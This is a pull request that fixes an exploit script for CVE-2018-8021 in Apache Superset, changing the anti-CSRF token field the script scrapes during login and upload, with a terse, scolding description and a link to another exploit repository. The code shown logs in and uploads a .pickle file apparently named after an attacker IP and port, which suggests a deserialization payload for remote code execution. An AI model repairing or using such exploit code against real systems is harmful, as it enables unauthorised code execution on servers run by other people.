### PR TITLE
Fix exploit.py

### DIFF
--- a/exploit.py
+++ b/exploit.py
@@ -53,7 +53,7 @@ def main() :
 		if login_page.status_code != 200:
 			print('Login page not reached')
 		login_tree = html.fromstring(login_page.content)
-		token = login_tree.xpath('//input[@id="token"]/@value')
+		token = login_tree.xpath('//input[@id="csrf_token"]/@value')
 		
 		login_data = {
 			'token' : token,
@@ -66,7 +66,7 @@ def main() :
 		if upload_page.status_code != 200:
 			print('Upload page not reached')
 		upload_tree = html.fromstring(upload_page.content)
-		token = upload_tree.xpath('//input[@id="token"]/@value')
+		token = upload_tree.xpath('//input[@id="csrf_token"]/@value')
 		headers_dict['Referer'] = upload_URL
 		upload = session.post(upload_URL, headers=headers_dict, data={'token':token}, files={'file':(str(args.ip)+'_'+str(args.port)+'.pickle',open(str(args.ip)+'_'+str(args.port)+'.pickle','rb'),'application/octet-stream')})
 		session.close()


### PR DESCRIPTION
You are referencing the wrong token for anti-csrf. The token name is 'csrf_token' and not 'token'. Of course, if you actually knew how Apache Superset and the exploit worked, you would know that. Next time, give credit where credit is due and cite your sources.

https://github.com/DavidMay121/ExploitDev/blob/master/CVE-2018-8021/CVE-2018-8021.py